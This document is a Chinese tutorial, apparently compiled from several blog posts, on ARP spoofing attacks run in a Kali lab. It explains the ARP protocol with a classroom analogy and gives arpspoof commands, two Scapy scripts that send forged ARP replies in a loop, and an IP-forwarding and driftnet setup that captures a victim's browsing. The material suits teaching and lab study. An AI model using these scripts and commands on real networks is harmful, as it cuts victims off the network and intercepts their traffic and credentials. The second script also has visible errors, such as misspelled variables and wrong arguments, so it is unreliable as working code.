本篇文章将介绍如何用arp欺骗实现断网的操作

首先要明白什么是arp以及什么是arp欺骗。因为局域网内是通过mac地址来识别对方的，而获取对方mac地址的时候可以实现欺骗，导致被攻击者获取的是攻击者的mac地址，误以为攻击者的电脑是他想要发送信息的目标。而这里主要还是用了arpspoof工具，他可以将网关mac替换为攻击者mac（mac就是指网卡地址），然后攻击者可截获受害者发送和收到的数据包，可获取受害者账户、密码等相关敏感信息。具体可以参考(5条消息) ARP原理和ARP攻击_天行健，君子以自强不息-CSDN博客_arp这篇文章。

在开始之前先确定kali是否安装了arpspoof，如果没有安装，参考(5条消息) Kali源 + 2020Kali没有arpspoof_是大方子-CSDN博客（科普一下apt是一个应用管理工具，apt是本地存了一份软件包信息的列表，比如软件大小，版本号，依赖等。也就是说apt update是更新这个列表，如果不更新，可能你安装的软件的时候安装成了老版本。）

下面是具体步骤：

首先查看自己的ip是什么

可以看到我们的网卡是eth0，ip是192.168.0.110

然后需要知道网关的ip是什么以及想要攻击的目标ip，可以用route -n看到所在网关的ip也可以用nmap -sP 192.168.0.*或者nmap -sP 192.168.0.0/24来扫描局域网内存在的主机

注意用nmap的时候要有root权限

这里让ip为192.168.0.113为攻击目标。先ping一下看ping的通吗，ping不通把防火墙关了试试

这里是可以的（还要注意，如果攻击的目标是在虚拟机里面，一定要将网络设置为桥接模式才可以）

 先将目标打开一个网站试试，也是可以的

接下来就实现断网攻击了，在kali里输入arpspoof -i 网卡 -t 被攻击主机的ip地址 当前网关地址

再看被攻击目标

已经被成功断网。

也可以通过查看被攻击者网关的物理地址是否变成了攻击者的物理地址来验证

可以看到网关的物理地址变成了攻击者的物理地址，那么这台机器每次发送请求，都会到这台机器上面去。想要取消断网ctrl+c就可以。

断网的原理也很简单：

在此之前我们已经了解到，arp欺骗的原理。而在此案例中，我们分析总结得知：受攻击计算机要想连接到局域网之外的网络，就必需要此局域网下的网关ip地址，通过网关ip地址得到对应的mac地址，根据mac地址通过网关，获得与局域网外界计算机建立连接，最终达到上网的目的。
不防大家，大胆试想一下，如果我们将arp缓存表中网关ip地址所对应的mac地址，修改为黑客计算的mac地址。并且，黑客计算机收到受控计算机的请求之后，没有继续将请求发送给网络，也没有将收到的信息转发给受控计算机。这样，就到达了对受控计算机断网的目的。
而以上案例的arp断网攻击，就是这一种方法。
 

 最后一个问题，就是我用kali(A)对另一台电脑(B)实现断网的时候，发现不止B被断了网,A以及他的真机也被断网了。原因是因为 B通信时会检查每次的MAC是否一样，不一样永远更新为最后一个，所以应该是arpspoof这个工具也在不断发送arp包来保证自己是最后一个，因为虚拟机的网也和真机是有关的，当虚拟机发送大量arp响应包时，网络中产生大量的arp通信量使网络堵塞，不断更改目标主机的arp缓存中IP-MAC条目，所以自己的网被占用了大量资源也会变得很慢。

实验拓扑：

1.首先进行ping测试网关和kali，来获取mac地址

ping 192.168.72.131

ping 192.168.72.20

MAC地址对应结果如下:

2.进行使用脚本中间人欺骗，脚本放在最后

3.查看欺骗后的arp表，R1和PC1都认为对方的mac地址是7B-26，也就是kali的mac

 python脚本:

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) != 3:
    print(sys.argv[0] + ":<target_IP> <spoof_ip>")
    sys.exit()

victimIP = sys.argv[1]  # 接收第二个参数:target_IP
gatewayIP = sys.argv[2]
packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP)  # 封装一个二层的ARP包，进行欺骗

while True:
    sendp(packet)   # 发送包
    time.sleep(3)
    print(packet.show())

先瞎扯一波

说到ARP欺骗，就不得不提OSI模型，它的知识量过于巨大，我都学不过来(叹气)，不过慢慢积累吧。
ARP协议（地址解析协议（英语：Address Resolution Protocol）是属于链路层的，很多东西我还不懂。。。
我先讲讲我对ARP欺骗的一些理解吧：

对于一台计算机来说，在错综复杂的网络世界，要识别它，有两个重要的识别卡，即“ip地址”和“MAC地址”，我把计算机就叫做小明吧：），MAC地址看做小明的学号（00:0c:29:90:f9:91），ip地址看做小明的座位号（192.168.40.128），小明入学后有了自己的学号，这个学号不出意外是不会改变的，而在班上，小明可能随时会调位置，他的座位号是可能会变化的，小明的学号和座位号在班上都是独一无二的，其他同学也是。

计算机就是这样，有着独一无二的MAC地址和ip地址，mac地址一般在生产的时候就确定了，而IP地址则是可以随时更改的，连不同的网就有不同的IP地址，比如我在家连的WiFi和在学校连的WiFi，我的电脑的ip是不同的，但mac地址是不会变的。那么计算机是怎样上网的呢？它怎么就可以浏览网页获取信息呢？这就要提到网关，通俗点讲就是我们的路由器，连WiFi时都少不了它，我们要浏览网页啥的都要向网关打招呼，需要网关的帮助下才能得到网页信息。假设老师就是网关（座位号一般是讲台：192.168.40.2，老师学工号有：00:50:56:fb:f4:14），小明上课想上厕所了，就必须跟老师请求，老师点头了，他才能出去。

简单说一下计算机上网的一个流程：

（假设计算机要去百度网页，这是一个不断发送数据包和接受数据包的过程，发包必须要有接受者的MAC地址）

步骤1、(计算机发出询问网关MAC地址)计算机要找到网关：谁是192.168.40.2 >>>>小明要找老师：座位号为192.168.40.2的老师是哪个

步骤2、（网关收到询问，作出应答）网关回应：192.168.40.2是在00:50:56:fb:f4:14>>>>老师回应：座位号为192.168.40.2的老师的学工号为：00:50:56:fb:f4:14

步骤3、计算机得到了网关mac地址，就开始封包，发包给网关>>>>小明知道老师的学工号，就可以跟这个学工号的老师说自己的请求

步骤4、网关得知这个请求包要发送至百度那，就给百度那发包>>>>老师知道小明要去上厕所，就跟打扫厕所的阿姨说小明要去那上厕所

步骤5、百度得到请求包就返回网关一个应答包>>>>打扫厕所的阿姨得到老师的消息后，就跟老师说可以上厕所

步骤6、网关要把应答包发给计算机，需要计算机的MAC地址：谁是192.168.40.128>>>老师得到消息后就问：谁的座位号是192.168.40.128

步骤7、计算机收到询问，发现自己就是192.168.40.128，就做出回应给网关：192.168.40.128在00:0c:29:90:f9:91>>>小明发现自己就是在192.168.40.128，就把自己的学号告诉老师

步骤8、网关的到计算机的MAC地址，就可以把应答包再封装一下发给计算机>>>老师是知道小明的学号了，就告诉学号为00:0c:29:90:f9:91的同学可以去上厕所了

步骤9、计算机收到应答包，可以看到百度网页了>>>小明得到老师的消息，就可以去上厕所了

以上差不多就是上网的基本流程了，不太专业，不好意思了，各位。

ARP欺骗原理

本来计算机与网关两个亲密无间，这是候有个第三者插足，攻击者主机，我叫他小强（学号[MAC地址]:00:0c:29:89:ce:8f 座位号[IP地址]:192.168.40.131）

1、攻击者假装自己是网关：步骤2中本来网关告诉计算机它的MAC地址是： 00:50:56:fb:f4:14，但是攻击者主机却不断地告诉计算机网关的MAC地址是：00:0c:29:89:ce:8f (攻击者主机自己的MAC地址)，这样的话，计算机在步骤3中封包，再发包就不是发给网关了，而是发给攻击者主机，如果攻击者主机不对计算机法老的包做处理，计算机就无法得到回应，也就无法上网了，实现了断网攻击。（小强骗小明自己就是老师，小明就向小强请求，小强不理会他的请求，小明就上不了厕所了）

2、攻击者假装自己是计算机：步骤7中攻击者主机因为都在同一局域网内，也收到了网关的询问，本来计算机告诉网关他的MAC地址是：00:0c:29:90:f9:91 ，但是攻击者却不断地告诉网关计算机的mac地址是：00:0c:29:89:ce:8f (攻击者主机自己的MAC地址)，这样步骤8网关封包后发包就不再是发给计算机，而是发给攻击者主机了，攻击者不把包再发给计算机，计算机仍然无法得到回应，也就上不了网。（小强骗老师说自己就是小明，老师把消息发给小强，小强不告诉小明老师给的消息，小明还是上不了厕所）

操作环境

我在虚拟机上装了kali和另外一台计算机，本来想用kali攻击宿主机(win10),但是貌似宿主机和虚拟机之间还有一个网关，太麻烦了，就直接在虚拟机上装了两台，另一台是被攻击者，便于操作，kali上的python都是2的。

python代码

#这里假装攻击者是网关
from scapy.all import *
interface='eht0'  #接口类型
tip='192.168.40.128' #计算机的IP地址，被攻击者
aip='192.168.40.131' #攻击者的IP地址
gip='192.168.40.2' #网关IP地址
tmac=getmacbyip('tip') #被攻击者的MAC地址
amac=getmacbyip('00:0c:29:89:ce:8f') #攻击者的MAC地址
pack=Ether(src=amc,dst=tmac)/ARP(hwsrc=amac,psrc=gip,hwdst=tmac,pdst=tip,op=2)#本来hwsrc应该是网关的MAC地址，攻击者换成了他自己的MAC地址
'''
公式：pack=Ether(src=攻击者MAC地址,dst=目标MAC地址)/ARP(hwsrc=攻击者MAC地址,psrc=要假装谁就是谁的IP地址,hwdst=目标MAC地址,pdst=目标IP地址,op=2)
'''
while 1:
	sendp(pack)

被攻击者还没被攻击前是这样的：

网关(192.168.40.2)MAC地址:00:50:56:fb:f4:14

ping baidu是通的，可以上网

攻击者发动攻击：

受害者它被攻击后：

网关mac地址变成了攻击者mac地址

已经断网了

kali工具arpspoof攻击

arpspoof -i <网卡名> -t <欺骗的目标> <假装是谁>

这里假装是网关

效果和python代码攻击是一样的，就不展示了

如果对拦截的包进行处理，受害者仍然能上网，只不过他上网的内容就被攻击者抓取到了
处理一下：

echo 1  >/proc/sys/net/ipv4/ip_forward

运用driftnet工具：


受害者浏览网页的图片就被抓到了

ps:如果您看到这，非常感谢您的观看，如果那里有错，希望路过能加以指正，非常感谢！